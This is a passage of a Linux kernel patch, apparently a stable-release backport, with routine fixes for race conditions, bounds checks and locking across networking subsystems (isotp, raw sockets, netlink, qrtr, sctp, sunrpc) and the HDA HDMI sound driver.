++	/* got signal: force tx state machine to be idle */
++	so->tx.state = ISOTP_IDLE;
++	hrtimer_cancel(&so->txfrtimer);
++	hrtimer_cancel(&so->txtimer);
+ err_out_drop:
+ 	/* drop this PDU and unlock a potential wait queue */
+-	old_state = ISOTP_IDLE;
+-err_out:
+-	so->tx.state = old_state;
+-	if (so->tx.state == ISOTP_IDLE)
+-		wake_up_interruptible(&so->wait);
++	so->tx.state = ISOTP_IDLE;
++	wake_up_interruptible(&so->wait);
+ 
+ 	return err;
+ }
+@@ -1120,7 +1125,7 @@ static int isotp_recvmsg(struct socket *sock, struct msghdr *msg, size_t size,
+ 	if (ret < 0)
+ 		goto out_err;
+ 
+-	sock_recv_timestamp(msg, sk, skb);
++	sock_recv_cmsgs(msg, sk, skb);
+ 
+ 	if (msg->msg_name) {
+ 		__sockaddr_check_size(ISOTP_MIN_NAMELEN);
+@@ -1150,10 +1155,12 @@ static int isotp_release(struct socket *sock)
+ 	net = sock_net(sk);
+ 
+ 	/* wait for complete transmission of current pdu */
+-	wait_event_interruptible(so->wait, so->tx.state == ISOTP_IDLE);
++	while (wait_event_interruptible(so->wait, so->tx.state == ISOTP_IDLE) == 0 &&
++	       cmpxchg(&so->tx.state, ISOTP_IDLE, ISOTP_SHUTDOWN) != ISOTP_IDLE)
++		;
+ 
+ 	/* force state machines to be idle also when a signal occurred */
+-	so->tx.state = ISOTP_IDLE;
++	so->tx.state = ISOTP_SHUTDOWN;
+ 	so->rx.state = ISOTP_IDLE;
+ 
+ 	spin_lock(&isotp_notifier_lock);
+@@ -1608,6 +1615,21 @@ static int isotp_init(struct sock *sk)
+ 	return 0;
+ }
+ 
++static __poll_t isotp_poll(struct file *file, struct socket *sock, poll_table *wait)
++{
++	struct sock *sk = sock->sk;
++	struct isotp_sock *so = isotp_sk(sk);
++
++	__poll_t mask = datagram_poll(file, sock, wait);
++	poll_wait(file, &so->wait, wait);
++
++	/* Check for false positives due to TX state */
++	if ((mask & EPOLLWRNORM) && (so->tx.state != ISOTP_IDLE))
++		mask &= ~(EPOLLOUT | EPOLLWRNORM);
++
++	return mask;
++}
++
+ static int isotp_sock_no_ioctlcmd(struct socket *sock, unsigned int cmd,
+ 				  unsigned long arg)
+ {
+@@ -1623,7 +1645,7 @@ static const struct proto_ops isotp_ops = {
+ 	.socketpair = sock_no_socketpair,
+ 	.accept = sock_no_accept,
+ 	.getname = isotp_getname,
+-	.poll = datagram_poll,
++	.poll = isotp_poll,
+ 	.ioctl = isotp_sock_no_ioctlcmd,
+ 	.gettstamp = sock_gettstamp,
+ 	.listen = sock_no_listen,
+diff --git a/net/can/j1939/transport.c b/net/can/j1939/transport.c
+index fb92c3609e172..fe3df23a25957 100644
+--- a/net/can/j1939/transport.c
++++ b/net/can/j1939/transport.c
+@@ -604,7 +604,10 @@ sk_buff *j1939_tp_tx_dat_new(struct j1939_priv *priv,
+ 	/* reserve CAN header */
+ 	skb_reserve(skb, offsetof(struct can_frame, data));
+ 
+-	memcpy(skb->cb, re_skcb, sizeof(skb->cb));
++	/* skb->cb must be large enough to hold a j1939_sk_buff_cb structure */
++	BUILD_BUG_ON(sizeof(skb->cb) < sizeof(*re_skcb));
++
++	memcpy(skb->cb, re_skcb, sizeof(*re_skcb));
+ 	skcb = j1939_skb_to_cb(skb);
+ 	if (swap_src_dst)
+ 		j1939_skbcb_swap(skcb);
+diff --git a/net/core/netpoll.c b/net/core/netpoll.c
+index 9be762e1d0428..4ac8d0ad9f6fc 100644
+--- a/net/core/netpoll.c
++++ b/net/core/netpoll.c
+@@ -137,6 +137,20 @@ static void queue_process(struct work_struct *work)
+ 	}
+ }
+ 
++static int netif_local_xmit_active(struct net_device *dev)
++{
++	int i;
++
++	for (i = 0; i < dev->num_tx_queues; i++) {
++		struct netdev_queue *txq = netdev_get_tx_queue(dev, i);
++
++		if (READ_ONCE(txq->xmit_lock_owner) == smp_processor_id())
++			return 1;
++	}
++
++	return 0;
++}
++
+ static void poll_one_napi(struct napi_struct *napi)
+ {
+ 	int work;
+@@ -183,7 +197,10 @@ void netpoll_poll_dev(struct net_device *dev)
+ 	if (!ni || down_trylock(&ni->dev_lock))
+ 		return;
+ 
+-	if (!netif_running(dev)) {
++	/* Some drivers will take the same locks in poll and xmit,
++	 * we can't poll if local CPU is already in xmit.
++	 */
++	if (!netif_running(dev) || netif_local_xmit_active(dev)) {
+ 		up(&ni->dev_lock);
+ 		return;
+ 	}
+diff --git a/net/ethtool/linkmodes.c b/net/ethtool/linkmodes.c
+index 126e06c713a3a..2d91f2a8c7626 100644
+--- a/net/ethtool/linkmodes.c
++++ b/net/ethtool/linkmodes.c
+@@ -282,11 +282,12 @@ static int ethnl_update_linkmodes(struct genl_info *info, struct nlattr **tb,
+ 					    "lanes configuration not supported by device");
+ 			return -EOPNOTSUPP;
+ 		}
+-	} else if (!lsettings->autoneg) {
+-		/* If autoneg is off and lanes parameter is not passed from user,
+-		 * set the lanes parameter to 0.
++	} else if (!lsettings->autoneg && ksettings->lanes) {
++		/* If autoneg is off and lanes parameter is not passed from user but
++		 * it was defined previously then set the lanes parameter to 0.
+ 		 */
+ 		ksettings->lanes = 0;
++		*mod = true;
+ 	}
+ 
+ 	ret = ethnl_update_bitset(ksettings->link_modes.advertising,
+diff --git a/net/ipv4/icmp.c b/net/ipv4/icmp.c
+index 46aa2d65e40ab..635ed4f057495 100644
+--- a/net/ipv4/icmp.c
++++ b/net/ipv4/icmp.c
+@@ -746,6 +746,11 @@ void __icmp_send(struct sk_buff *skb_in, int type, int code, __be32 info,
+ 		room = 576;
+ 	room -= sizeof(struct iphdr) + icmp_param.replyopts.opt.opt.optlen;
+ 	room -= sizeof(struct icmphdr);
++	/* Guard against tiny mtu. We need to include at least one
++	 * IP network header for this message to make any sense.
++	 */
++	if (room <= (int)sizeof(struct iphdr))
++		goto ende;
+ 
+ 	icmp_param.data_len = skb_in->len - icmp_param.offset;
+ 	if (icmp_param.data_len > room)
+diff --git a/net/ipv4/ping.c b/net/ipv4/ping.c
+index 409ec2a1f95b0..5178a3f3cb537 100644
+--- a/net/ipv4/ping.c
++++ b/net/ipv4/ping.c
+@@ -1089,13 +1089,13 @@ static struct sock *ping_get_idx(struct seq_file *seq, loff_t pos)
+ }
+ 
+ void *ping_seq_start(struct seq_file *seq, loff_t *pos, sa_family_t family)
+-	__acquires(RCU)
++	__acquires(ping_table.lock)
+ {
+ 	struct ping_iter_state *state = seq->private;
+ 	state->bucket = 0;
+ 	state->family = family;
+ 
+-	rcu_read_lock();
++	spin_lock(&ping_table.lock);
+ 
+ 	return *pos ? ping_get_idx(seq, *pos-1) : SEQ_START_TOKEN;
+ }
+@@ -1121,9 +1121,9 @@ void *ping_seq_next(struct seq_file *seq, void *v, loff_t *pos)
+ EXPORT_SYMBOL_GPL(ping_seq_next);
+ 
+ void ping_seq_stop(struct seq_file *seq, void *v)
+-	__releases(RCU)
++	__releases(ping_table.lock)
+ {
+-	rcu_read_unlock();
++	spin_unlock(&ping_table.lock);
+ }
+ EXPORT_SYMBOL_GPL(ping_seq_stop);
+ 
+diff --git a/net/ipv4/raw.c b/net/ipv4/raw.c
+index 006c1f0ed8b47..af03aa8a8e513 100644
+--- a/net/ipv4/raw.c
++++ b/net/ipv4/raw.c
+@@ -91,12 +91,12 @@ EXPORT_SYMBOL_GPL(raw_v4_hashinfo);
+ int raw_hash_sk(struct sock *sk)
+ {
+ 	struct raw_hashinfo *h = sk->sk_prot->h.raw_hash;
+-	struct hlist_nulls_head *hlist;
++	struct hlist_head *hlist;
+ 
+-	hlist = &h->ht[inet_sk(sk)->inet_num & (RAW_HTABLE_SIZE - 1)];
++	hlist = &h->ht[raw_hashfunc(sock_net(sk), inet_sk(sk)->inet_num)];
+ 
+ 	spin_lock(&h->lock);
+-	__sk_nulls_add_node_rcu(sk, hlist);
++	sk_add_node_rcu(sk, hlist);
+ 	sock_set_flag(sk, SOCK_RCU_FREE);
+ 	spin_unlock(&h->lock);
+ 	sock_prot_inuse_add(sock_net(sk), sk->sk_prot, 1);
+@@ -110,7 +110,7 @@ void raw_unhash_sk(struct sock *sk)
+ 	struct raw_hashinfo *h = sk->sk_prot->h.raw_hash;
+ 
+ 	spin_lock(&h->lock);
+-	if (__sk_nulls_del_node_init_rcu(sk))
++	if (sk_del_node_init_rcu(sk))
+ 		sock_prot_inuse_add(sock_net(sk), sk->sk_prot, -1);
+ 	spin_unlock(&h->lock);
+ }
+@@ -160,19 +160,18 @@ static int icmp_filter(const struct sock *sk, const struct sk_buff *skb)
+  * RFC 1122: SHOULD pass TOS value up to the transport layer.
+  * -> It does. And not only TOS, but all IP header.
+  */
+-static int raw_v4_input(struct sk_buff *skb, const struct iphdr *iph, int hash)
++static int raw_v4_input(struct net *net, struct sk_buff *skb,
++			const struct iphdr *iph, int hash)
+ {
+-	struct net *net = dev_net(skb->dev);
+-	struct hlist_nulls_head *hlist;
+-	struct hlist_nulls_node *hnode;
+ 	int sdif = inet_sdif(skb);
++	struct hlist_head *hlist;
+ 	int dif = inet_iif(skb);
+ 	int delivered = 0;
+ 	struct sock *sk;
+ 
+ 	hlist = &raw_v4_hashinfo.ht[hash];
+ 	rcu_read_lock();
+-	sk_nulls_for_each(sk, hnode, hlist) {
++	sk_for_each_rcu(sk, hlist) {
+ 		if (!raw_v4_match(net, sk, iph->protocol,
+ 				  iph->saddr, iph->daddr, dif, sdif))
+ 			continue;
+@@ -193,9 +192,10 @@ static int raw_v4_input(struct sk_buff *skb, const struct iphdr *iph, int hash)
+ 
+ int raw_local_deliver(struct sk_buff *skb, int protocol)
+ {
+-	int hash = protocol & (RAW_HTABLE_SIZE - 1);
++	struct net *net = dev_net(skb->dev);
+ 
+-	return raw_v4_input(skb, ip_hdr(skb), hash);
++	return raw_v4_input(net, skb, ip_hdr(skb),
++			    raw_hashfunc(net, protocol));
+ }
+ 
+ static void raw_err(struct sock *sk, struct sk_buff *skb, u32 info)
+@@ -263,19 +263,18 @@ static void raw_err(struct sock *sk, struct sk_buff *skb, u32 info)
+ void raw_icmp_error(struct sk_buff *skb, int protocol, u32 info)
+ {
+ 	struct net *net = dev_net(skb->dev);
+-	struct hlist_nulls_head *hlist;
+-	struct hlist_nulls_node *hnode;
+ 	int dif = skb->dev->ifindex;
+ 	int sdif = inet_sdif(skb);
++	struct hlist_head *hlist;
+ 	const struct iphdr *iph;
+ 	struct sock *sk;
+ 	int hash;
+ 
+-	hash = protocol & (RAW_HTABLE_SIZE - 1);
++	hash = raw_hashfunc(net, protocol);
+ 	hlist = &raw_v4_hashinfo.ht[hash];
+ 
+ 	rcu_read_lock();
+-	sk_nulls_for_each(sk, hnode, hlist) {
++	sk_for_each_rcu(sk, hlist) {
+ 		iph = (const struct iphdr *)skb->data;
+ 		if (!raw_v4_match(net, sk, iph->protocol,
+ 				  iph->daddr, iph->saddr, dif, sdif))
+@@ -947,14 +946,13 @@ static struct sock *raw_get_first(struct seq_file *seq, int bucket)
+ {
+ 	struct raw_hashinfo *h = pde_data(file_inode(seq->file));
+ 	struct raw_iter_state *state = raw_seq_private(seq);
+-	struct hlist_nulls_head *hlist;
+-	struct hlist_nulls_node *hnode;
++	struct hlist_head *hlist;
+ 	struct sock *sk;
+ 
+ 	for (state->bucket = bucket; state->bucket < RAW_HTABLE_SIZE;
+ 			++state->bucket) {
+ 		hlist = &h->ht[state->bucket];
+-		sk_nulls_for_each(sk, hnode, hlist) {
++		sk_for_each(sk, hlist) {
+ 			if (sock_net(sk) == seq_file_net(seq))
+ 				return sk;
+ 		}
+@@ -967,7 +965,7 @@ static struct sock *raw_get_next(struct seq_file *seq, struct sock *sk)
+ 	struct raw_iter_state *state = raw_seq_private(seq);
+ 
+ 	do {
+-		sk = sk_nulls_next(sk);
++		sk = sk_next(sk);
+ 	} while (sk && sock_net(sk) != seq_file_net(seq));
+ 
+ 	if (!sk)
+@@ -986,9 +984,12 @@ static struct sock *raw_get_idx(struct seq_file *seq, loff_t pos)
+ }
+ 
+ void *raw_seq_start(struct seq_file *seq, loff_t *pos)
+-	__acquires(RCU)
++	__acquires(&h->lock)
+ {
+-	rcu_read_lock();
++	struct raw_hashinfo *h = pde_data(file_inode(seq->file));
++
++	spin_lock(&h->lock);
++
+ 	return *pos ? raw_get_idx(seq, *pos - 1) : SEQ_START_TOKEN;
+ }
+ EXPORT_SYMBOL_GPL(raw_seq_start);
+@@ -1007,9 +1008,11 @@ void *raw_seq_next(struct seq_file *seq, void *v, loff_t *pos)
+ EXPORT_SYMBOL_GPL(raw_seq_next);
+ 
+ void raw_seq_stop(struct seq_file *seq, void *v)
+-	__releases(RCU)
++	__releases(&h->lock)
+ {
+-	rcu_read_unlock();
++	struct raw_hashinfo *h = pde_data(file_inode(seq->file));
++
++	spin_unlock(&h->lock);
+ }
+ EXPORT_SYMBOL_GPL(raw_seq_stop);
+ 
+diff --git a/net/ipv4/raw_diag.c b/net/ipv4/raw_diag.c
+index 999321834b94a..da3591a66a169 100644
+--- a/net/ipv4/raw_diag.c
++++ b/net/ipv4/raw_diag.c
+@@ -57,8 +57,7 @@ static bool raw_lookup(struct net *net, struct sock *sk,
+ static struct sock *raw_sock_get(struct net *net, const struct inet_diag_req_v2 *r)
+ {
+ 	struct raw_hashinfo *hashinfo = raw_get_hashinfo(r);
+-	struct hlist_nulls_head *hlist;
+-	struct hlist_nulls_node *hnode;
++	struct hlist_head *hlist;
+ 	struct sock *sk;
+ 	int slot;
+ 
+@@ -68,7 +67,7 @@ static struct sock *raw_sock_get(struct net *net, const struct inet_diag_req_v2
+ 	rcu_read_lock();
+ 	for (slot = 0; slot < RAW_HTABLE_SIZE; slot++) {
+ 		hlist = &hashinfo->ht[slot];
+-		sk_nulls_for_each(sk, hnode, hlist) {
++		sk_for_each_rcu(sk, hlist) {
+ 			if (raw_lookup(net, sk, r)) {
+ 				/*
+ 				 * Grab it and keep until we fill
+@@ -142,9 +141,8 @@ static void raw_diag_dump(struct sk_buff *skb, struct netlink_callback *cb,
+ 	struct raw_hashinfo *hashinfo = raw_get_hashinfo(r);
+ 	struct net *net = sock_net(skb->sk);
+ 	struct inet_diag_dump_data *cb_data;
+-	struct hlist_nulls_head *hlist;
+-	struct hlist_nulls_node *hnode;
+ 	int num, s_num, slot, s_slot;
++	struct hlist_head *hlist;
+ 	struct sock *sk = NULL;
+ 	struct nlattr *bc;
+ 
+@@ -161,7 +159,7 @@ static void raw_diag_dump(struct sk_buff *skb, struct netlink_callback *cb,
+ 		num = 0;
+ 
+ 		hlist = &hashinfo->ht[slot];
+-		sk_nulls_for_each(sk, hnode, hlist) {
++		sk_for_each_rcu(sk, hlist) {
+ 			struct inet_sock *inet = inet_sk(sk);
+ 
+ 			if (!net_eq(sock_net(sk), net))
+diff --git a/net/ipv6/ip6_output.c b/net/ipv6/ip6_output.c
+index c314fdde0097c..95a55c6630add 100644
+--- a/net/ipv6/ip6_output.c
++++ b/net/ipv6/ip6_output.c
+@@ -1965,8 +1965,13 @@ struct sk_buff *__ip6_make_skb(struct sock *sk,
+ 	IP6_UPD_PO_STATS(net, rt->rt6i_idev, IPSTATS_MIB_OUT, skb->len);
+ 	if (proto == IPPROTO_ICMPV6) {
+ 		struct inet6_dev *idev = ip6_dst_idev(skb_dst(skb));
++		u8 icmp6_type;
+ 
+-		ICMP6MSGOUT_INC_STATS(net, idev, icmp6_hdr(skb)->icmp6_type);
++		if (sk->sk_socket->type == SOCK_RAW && !inet_sk(sk)->hdrincl)
++			icmp6_type = fl6->fl6_icmp_type;
++		else
++			icmp6_type = icmp6_hdr(skb)->icmp6_type;
++		ICMP6MSGOUT_INC_STATS(net, idev, icmp6_type);
+ 		ICMP6_INC_STATS(net, idev, ICMP6_MIB_OUTMSGS);
+ 	}
+ 
+diff --git a/net/ipv6/raw.c b/net/ipv6/raw.c
+index ada087b50541a..4fc511bdf176c 100644
+--- a/net/ipv6/raw.c
++++ b/net/ipv6/raw.c
+@@ -141,10 +141,9 @@ EXPORT_SYMBOL(rawv6_mh_filter_unregister);
+ static bool ipv6_raw_deliver(struct sk_buff *skb, int nexthdr)
+ {
+ 	struct net *net = dev_net(skb->dev);
+-	struct hlist_nulls_head *hlist;
+-	struct hlist_nulls_node *hnode;
+ 	const struct in6_addr *saddr;
+ 	const struct in6_addr *daddr;
++	struct hlist_head *hlist;
+ 	struct sock *sk;
+ 	bool delivered = false;
+ 	__u8 hash;
+@@ -152,10 +151,10 @@ static bool ipv6_raw_deliver(struct sk_buff *skb, int nexthdr)
+ 	saddr = &ipv6_hdr(skb)->saddr;
+ 	daddr = saddr + 1;
+ 
+-	hash = nexthdr & (RAW_HTABLE_SIZE - 1);
++	hash = raw_hashfunc(net, nexthdr);
+ 	hlist = &raw_v6_hashinfo.ht[hash];
+ 	rcu_read_lock();
+-	sk_nulls_for_each(sk, hnode, hlist) {
++	sk_for_each_rcu(sk, hlist) {
+ 		int filtered;
+ 
+ 		if (!raw_v6_match(net, sk, nexthdr, daddr, saddr,
+@@ -333,15 +332,14 @@ void raw6_icmp_error(struct sk_buff *skb, int nexthdr,
+ 		u8 type, u8 code, int inner_offset, __be32 info)
+ {
+ 	struct net *net = dev_net(skb->dev);
+-	struct hlist_nulls_head *hlist;
+-	struct hlist_nulls_node *hnode;
++	struct hlist_head *hlist;
+ 	struct sock *sk;
+ 	int hash;
+ 
+-	hash = nexthdr & (RAW_HTABLE_SIZE - 1);
++	hash = raw_hashfunc(net, nexthdr);
+ 	hlist = &raw_v6_hashinfo.ht[hash];
+ 	rcu_read_lock();
+-	sk_nulls_for_each(sk, hnode, hlist) {
++	sk_for_each_rcu(sk, hlist) {
+ 		/* Note: ipv6_hdr(skb) != skb->data */
+ 		const struct ipv6hdr *ip6h = (const struct ipv6hdr *)skb->data;
+ 
+diff --git a/net/l2tp/l2tp_ip.c b/net/l2tp/l2tp_ip.c
+index 4db5a554bdbd9..41a74fc84ca13 100644
+--- a/net/l2tp/l2tp_ip.c
++++ b/net/l2tp/l2tp_ip.c
+@@ -677,8 +677,8 @@ MODULE_AUTHOR("James Chapman <jchapman@katalix.com>");
+ MODULE_DESCRIPTION("L2TP over IP");
+ MODULE_VERSION("1.0");
+ 
+-/* Use the value of SOCK_DGRAM (2) directory, because __stringify doesn't like
+- * enums
++/* Use the values of SOCK_DGRAM (2) as type and IPPROTO_L2TP (115) as protocol,
++ * because __stringify doesn't like enums
+  */
+-MODULE_ALIAS_NET_PF_PROTO_TYPE(PF_INET, 2, IPPROTO_L2TP);
+-MODULE_ALIAS_NET_PF_PROTO(PF_INET, IPPROTO_L2TP);
++MODULE_ALIAS_NET_PF_PROTO_TYPE(PF_INET, 115, 2);
++MODULE_ALIAS_NET_PF_PROTO(PF_INET, 115);
+diff --git a/net/l2tp/l2tp_ip6.c b/net/l2tp/l2tp_ip6.c
+index 2478aa60145fb..5137ea1861ce2 100644
+--- a/net/l2tp/l2tp_ip6.c
++++ b/net/l2tp/l2tp_ip6.c
+@@ -806,8 +806,8 @@ MODULE_AUTHOR("Chris Elston <celston@katalix.com>");
+ MODULE_DESCRIPTION("L2TP IP encapsulation for IPv6");
+ MODULE_VERSION("1.0");
+ 
+-/* Use the value of SOCK_DGRAM (2) directory, because __stringify doesn't like
+- * enums
++/* Use the values of SOCK_DGRAM (2) as type and IPPROTO_L2TP (115) as protocol,
++ * because __stringify doesn't like enums
+  */
+-MODULE_ALIAS_NET_PF_PROTO_TYPE(PF_INET6, 2, IPPROTO_L2TP);
+-MODULE_ALIAS_NET_PF_PROTO(PF_INET6, IPPROTO_L2TP);
++MODULE_ALIAS_NET_PF_PROTO_TYPE(PF_INET6, 115, 2);
++MODULE_ALIAS_NET_PF_PROTO(PF_INET6, 115);
+diff --git a/net/mac80211/sta_info.c b/net/mac80211/sta_info.c
+index 34cb833db25f5..39731ef51e03a 100644
+--- a/net/mac80211/sta_info.c
++++ b/net/mac80211/sta_info.c
+@@ -1261,7 +1261,8 @@ static int __must_check __sta_info_destroy_part1(struct sta_info *sta)
+ 	list_del_rcu(&sta->list);
+ 	sta->removed = true;
+ 
+-	drv_sta_pre_rcu_remove(local, sta->sdata, sta);
++	if (sta->uploaded)
++		drv_sta_pre_rcu_remove(local, sta->sdata, sta);
+ 
+ 	if (sdata->vif.type == NL80211_IFTYPE_AP_VLAN &&
+ 	    rcu_access_pointer(sdata->u.vlan.sta) == sta)
+diff --git a/net/mac80211/util.c b/net/mac80211/util.c
+index 9c219e525eded..ed9e659f49f63 100644
+--- a/net/mac80211/util.c
++++ b/net/mac80211/util.c
+@@ -4906,7 +4906,7 @@ u8 ieee80211_ie_len_eht_cap(struct ieee80211_sub_if_data *sdata, u8 iftype)
+ 				       &eht_cap->eht_cap_elem,
+ 				       is_ap);
+ 	return 2 + 1 +
+-	       sizeof(he_cap->he_cap_elem) + n +
++	       sizeof(eht_cap->eht_cap_elem) + n +
+ 	       ieee80211_eht_ppe_size(eht_cap->eht_ppe_thres[0],
+ 				      eht_cap->eht_cap_elem.phy_cap_info);
+ 	return 0;
+diff --git a/net/netlink/af_netlink.c b/net/netlink/af_netlink.c
+index c642776597531..f365dfdd672d7 100644
+--- a/net/netlink/af_netlink.c
++++ b/net/netlink/af_netlink.c
+@@ -1952,7 +1952,7 @@ static int netlink_recvmsg(struct socket *sock, struct msghdr *msg, size_t len,
+ 	struct scm_cookie scm;
+ 	struct sock *sk = sock->sk;
+ 	struct netlink_sock *nlk = nlk_sk(sk);
+-	size_t copied;
++	size_t copied, max_recvmsg_len;
+ 	struct sk_buff *skb, *data_skb;
+ 	int err, ret;
+ 
+@@ -1985,9 +1985,10 @@ static int netlink_recvmsg(struct socket *sock, struct msghdr *msg, size_t len,
+ #endif
+ 
+ 	/* Record the max length of recvmsg() calls for future allocations */
+-	nlk->max_recvmsg_len = max(nlk->max_recvmsg_len, len);
+-	nlk->max_recvmsg_len = min_t(size_t, nlk->max_recvmsg_len,
+-				     SKB_WITH_OVERHEAD(32768));
++	max_recvmsg_len = max(READ_ONCE(nlk->max_recvmsg_len), len);
++	max_recvmsg_len = min_t(size_t, max_recvmsg_len,
++				SKB_WITH_OVERHEAD(32768));
++	WRITE_ONCE(nlk->max_recvmsg_len, max_recvmsg_len);
+ 
+ 	copied = data_skb->len;
+ 	if (len < copied) {
+@@ -2236,6 +2237,7 @@ static int netlink_dump(struct sock *sk)
+ 	struct netlink_ext_ack extack = {};
+ 	struct netlink_callback *cb;
+ 	struct sk_buff *skb = NULL;
++	size_t max_recvmsg_len;
+ 	struct module *module;
+ 	int err = -ENOBUFS;
+ 	int alloc_min_size;
+@@ -2258,8 +2260,9 @@ static int netlink_dump(struct sock *sk)
+ 	cb = &nlk->cb;
+ 	alloc_min_size = max_t(int, cb->min_dump_alloc, NLMSG_GOODSIZE);
+ 
+-	if (alloc_min_size < nlk->max_recvmsg_len) {
+-		alloc_size = nlk->max_recvmsg_len;
++	max_recvmsg_len = READ_ONCE(nlk->max_recvmsg_len);
++	if (alloc_min_size < max_recvmsg_len) {
++		alloc_size = max_recvmsg_len;
+ 		skb = alloc_skb(alloc_size,
+ 				(GFP_KERNEL & ~__GFP_DIRECT_RECLAIM) |
+ 				__GFP_NOWARN | __GFP_NORETRY);
+diff --git a/net/qrtr/af_qrtr.c b/net/qrtr/af_qrtr.c
+index 5c2fb992803b7..3a70255c8d02f 100644
+--- a/net/qrtr/af_qrtr.c
++++ b/net/qrtr/af_qrtr.c
+@@ -393,10 +393,12 @@ static struct qrtr_node *qrtr_node_lookup(unsigned int nid)
+ 	struct qrtr_node *node;
+ 	unsigned long flags;
+ 
++	mutex_lock(&qrtr_node_lock);
+ 	spin_lock_irqsave(&qrtr_nodes_lock, flags);
+ 	node = radix_tree_lookup(&qrtr_nodes, nid);
+ 	node = qrtr_node_acquire(node);
+ 	spin_unlock_irqrestore(&qrtr_nodes_lock, flags);
++	mutex_unlock(&qrtr_node_lock);
+ 
+ 	return node;
+ }
+diff --git a/net/qrtr/ns.c b/net/qrtr/ns.c
+index e595079c2cafe..3e40a1ba48f79 100644
+--- a/net/qrtr/ns.c
++++ b/net/qrtr/ns.c
+@@ -273,7 +273,7 @@ err:
+ 	return NULL;
+ }
+ 
+-static int server_del(struct qrtr_node *node, unsigned int port)
++static int server_del(struct qrtr_node *node, unsigned int port, bool bcast)
+ {
+ 	struct qrtr_lookup *lookup;
+ 	struct qrtr_server *srv;
+@@ -286,7 +286,7 @@ static int server_del(struct qrtr_node *node, unsigned int port)
+ 	radix_tree_delete(&node->servers, port);
+ 
+ 	/* Broadcast the removal of local servers */
+-	if (srv->node == qrtr_ns.local_node)
++	if (srv->node == qrtr_ns.local_node && bcast)
+ 		service_announce_del(&qrtr_ns.bcast_sq, srv);
+ 
+ 	/* Announce the service's disappearance to observers */
+@@ -372,7 +372,7 @@ static int ctrl_cmd_bye(struct sockaddr_qrtr *from)
+ 		}
+ 		slot = radix_tree_iter_resume(slot, &iter);
+ 		rcu_read_unlock();
+-		server_del(node, srv->port);
++		server_del(node, srv->port, true);
+ 		rcu_read_lock();
+ 	}
+ 	rcu_read_unlock();
+@@ -458,10 +458,13 @@ static int ctrl_cmd_del_client(struct sockaddr_qrtr *from,
+ 		kfree(lookup);
+ 	}
+ 
+-	/* Remove the server belonging to this port */
++	/* Remove the server belonging to this port but don't broadcast
++	 * DEL_SERVER. Neighbours would've already removed the server belonging
++	 * to this port due to the DEL_CLIENT broadcast from qrtr_port_remove().
++	 */
+ 	node = node_get(node_id);
+ 	if (node)
+-		server_del(node, port);
++		server_del(node, port, false);
+ 
+ 	/* Advertise the removal of this client to all local servers */
+ 	local_node = node_get(qrtr_ns.local_node);
+@@ -566,7 +569,7 @@ static int ctrl_cmd_del_server(struct sockaddr_qrtr *from,
+ 	if (!node)
+ 		return -ENOENT;
+ 
+-	return server_del(node, port);
++	return server_del(node, port, true);
+ }
+ 
+ static int ctrl_cmd_new_lookup(struct sockaddr_qrtr *from,
+diff --git a/net/sctp/socket.c b/net/sctp/socket.c
+index 84021a6c4f9da..ec7d1a89efbbd 100644
+--- a/net/sctp/socket.c
++++ b/net/sctp/socket.c
+@@ -1829,6 +1829,10 @@ static int sctp_sendmsg_to_asoc(struct sctp_association *asoc,
+ 		err = sctp_wait_for_sndbuf(asoc, &timeo, msg_len);
+ 		if (err)
+ 			goto err;
++		if (unlikely(sinfo->sinfo_stream >= asoc->stream.outcnt)) {
++			err = -EINVAL;
++			goto err;
++		}
+ 	}
+ 
+ 	if (sctp_state(asoc, CLOSED)) {
+diff --git a/net/sunrpc/svcauth_unix.c b/net/sunrpc/svcauth_unix.c
+index b1efc34db6ed8..609ade4fb49ed 100644
+--- a/net/sunrpc/svcauth_unix.c
++++ b/net/sunrpc/svcauth_unix.c
+@@ -416,14 +416,23 @@ static int unix_gid_hash(kuid_t uid)
+ 	return hash_long(from_kuid(&init_user_ns, uid), GID_HASHBITS);
+ }
+ 
+-static void unix_gid_put(struct kref *kref)
++static void unix_gid_free(struct rcu_head *rcu)
+ {
+-	struct cache_head *item = container_of(kref, struct cache_head, ref);
+-	struct unix_gid *ug = container_of(item, struct unix_gid, h);
++	struct unix_gid *ug = container_of(rcu, struct unix_gid, rcu);
++	struct cache_head *item = &ug->h;
++
+ 	if (test_bit(CACHE_VALID, &item->flags) &&
+ 	    !test_bit(CACHE_NEGATIVE, &item->flags))
+ 		put_group_info(ug->gi);
+-	kfree_rcu(ug, rcu);
++	kfree(ug);
++}
++
++static void unix_gid_put(struct kref *kref)
++{
++	struct cache_head *item = container_of(kref, struct cache_head, ref);
++	struct unix_gid *ug = container_of(item, struct unix_gid, h);
++
++	call_rcu(&ug->rcu, unix_gid_free);
+ }
+ 
+ static int unix_gid_match(struct cache_head *corig, struct cache_head *cnew)
+diff --git a/sound/pci/hda/patch_hdmi.c b/sound/pci/hda/patch_hdmi.c
+index 9ea633fe93393..4ffa3a59f419f 100644
+--- a/sound/pci/hda/patch_hdmi.c
++++ b/sound/pci/hda/patch_hdmi.c
+@@ -81,6 +81,7 @@ struct hdmi_spec_per_pin {
+ 	struct delayed_work work;
+ 	struct hdmi_pcm *pcm; /* pointer to spec->pcm_rec[n] dynamically*/
+ 	int pcm_idx; /* which pcm is attached. -1 means no pcm is attached */
++	int prev_pcm_idx; /* previously assigned pcm index */
+ 	int repoll_count;
+ 	bool setup; /* the stream has been set up by prepare callback */
+ 	bool silent_stream;
+@@ -1380,9 +1381,17 @@ static void hdmi_attach_hda_pcm(struct hdmi_spec *spec,
+ 	/* pcm already be attached to the pin */
+ 	if (per_pin->pcm)
+ 		return;
++	/* try the previously used slot at first */
++	idx = per_pin->prev_pcm_idx;
++	if (idx >= 0) {
++		if (!test_bit(idx, &spec->pcm_bitmap))
++			goto found;
++		per_pin->prev_pcm_idx = -1; /* no longer valid, clear it */
++	}
+ 	idx = hdmi_find_pcm_slot(spec, per_pin);
+ 	if (idx == -EBUSY)
+ 		return;
++ found:
+ 	per_pin->pcm_idx = idx;
+ 	per_pin->pcm = get_hdmi_pcm(spec, idx);
+ 	set_bit(idx, &spec->pcm_bitmap);
+@@ -1398,6 +1407,7 @@ static void hdmi_detach_hda_pcm(struct hdmi_spec *spec,
+ 		return;
+ 	idx = per_pin->pcm_idx;
+ 	per_pin->pcm_idx = -1;
++	per_pin->prev_pcm_idx = idx; /* remember the previous index */
+ 	per_pin->pcm = NULL;
+ 	if (idx >= 0 && idx < spec->pcm_used)
+ 		clear_bit(idx, &spec->pcm_bitmap);
+@@ -1924,6 +1934,7 @@ static int hdmi_add_pin(struct hda_codec *codec, hda_nid_t pin_nid)
+ 
+ 		per_pin->pcm = NULL;
+ 		per_pin->pcm_idx = -1;
++		per_pin->prev_pcm_idx = -1;
